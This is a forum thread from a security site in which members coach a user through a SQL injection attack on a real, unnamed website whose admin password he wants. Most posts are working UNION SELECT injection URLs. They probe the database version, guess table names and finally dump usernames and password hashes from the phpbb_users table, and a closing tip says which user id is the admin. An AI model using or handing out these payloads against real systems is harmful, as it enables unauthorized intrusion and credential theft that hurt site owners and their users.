 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Sat Nov 08, 2008 1:09 pm |
 |
|
| skmpz |
| Advanced user |
 |
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
 |
|
 |
|
only in:
| Code: | <title>xyz</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1253">
<link href="css/style.css" rel="stylesheet" type="text/css">
<meta name="keywords" content="xyz">
<meta name="description" content="xyz">
|
btw i downloaded the program.. |
|
|
|
|
| Posted: Sat Nov 08, 2008 1:28 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
So you have visual feedback!
If you tried this before:
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1111,2222,3333,4444,5555,6666,7777,8888,9999,101010--+
|
then what number you saw in title?
And try this:
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version--+
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 1:35 pm |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
with the 1st one i get 2222 on the title.. and
with the second
4.1.20[/code] |
|
|
|
|
| Posted: Sat Nov 08, 2008 1:58 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, you want get admin's pass? Do you have access to admin login page?
And you can try to guess possible interesting table names:
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,COUNT(*),3,4,5,6,7,8,9,10+FROM+admin--+
|
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,COUNT(*),3,4,5,6,7,8,9,10+FROM+admins--+
|
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,COUNT(*),3,4,5,6,7,8,9,10+FROM+user--+
|
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,COUNT(*),3,4,5,6,7,8,9,10+FROM+users--+
|
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,COUNT(*),3,4,5,6,7,8,9,10+FROM+account--+
|
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,COUNT(*),3,4,5,6,7,8,9,10+FROM+member--+
|
... you got idea  |
|
|
|
|
|
 |
|
 |
| Posted: Sun Nov 09, 2008 12:32 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
no i dont have access to admin's login page ..
i have to keeep trying until i find the databases name ?
isnt there anyway i could find the name ? |
|
|
|
|
| Posted: Sun Nov 09, 2008 12:43 am |
|
|
| Henderson |
| Valuable expert |
 |
|
| Joined: Jul 11, 2008 |
| Posts: 58 |
|
|
|
|
|
|
|
You can also check if there's any opensource script installed, e.g. a forum. It's tables could be in the same db  |
|
|
|
|
| Posted: Sun Nov 09, 2008 1:33 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Nov 09, 2008 1:50 am |
|
|
| Henderson |
| Valuable expert |
|
|
| Joined: Jul 11, 2008 |
| Posts: 58 |
|
|
|
|
|
|
|
| Then try to read from table phpbb_users |
|
|
|
|
| Posted: Sun Nov 09, 2008 2:00 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
hm..
| Code: | | http://www.xxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,COUNT(*),3,4,5,6,7,8,9,10+FROM+phpbb_users--+ |
it does open the site without error and it has 91 in page title..
??? |
|
|
|
|
| Posted: Sun Nov 09, 2008 2:05 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| So there is 91 users in that table |
|
|
|
|
| Posted: Sun Nov 09, 2008 2:18 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
erm.. yes .. i dint really care about how many they are
the admin pass is the one i need
btw with
| Code: | | http://www.xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,username,3,4,5,6,7,8,9,10+FROM+phpbb_users |
i get "Anonymous".
|
|
|
|
|
| Posted: Sun Nov 09, 2008 2:26 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
and also with:
| Code: | | http://www.xxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,concat(user(),0x3e,version()),3,4,5,6,7,8,9,10+FROM+phpbb_users |
i get megahz4@fusion.bpweb.net>4.1.20
grrrr. how can i get the pass ???? |
|
|
|
|
| Posted: Sun Nov 09, 2008 2:37 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Code: |
http://www.xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,CONCAT_WS(0x3a,username,user_password),3,4,5,6,7,8,9,10+FROM+phpbb_users+ORDER+BY+user_id+ASC+LIMIT+1,1
|
| Code: |
http://www.xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,CONCAT_WS(0x3a,username,user_password),3,4,5,6,7,8,9,10+FROM+phpbb_users+ORDER+BY+user_id+ASC+LIMIT+2,1
|
... and so on |
|
|
|
|
| Posted: Sun Nov 09, 2008 2:42 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
at laaaaaaast!!!
thanx a lot waraxe ur the best
u2 hendersson..
erm.. smth last.. is the admin user always 1st ? i mean id 1 ? |
|
|
|
|
| Posted: Sun Nov 09, 2008 2:50 am |
|
|
| Henderson |
| Valuable expert |
|
|
| Joined: Jul 11, 2008 |
| Posts: 58 |
|
|
|
|
|
|
|
Admin id is 2 in phpbb  |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 4
Goto page Previous1, 2, 3, 4Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 280
Members: 0
Total: 280
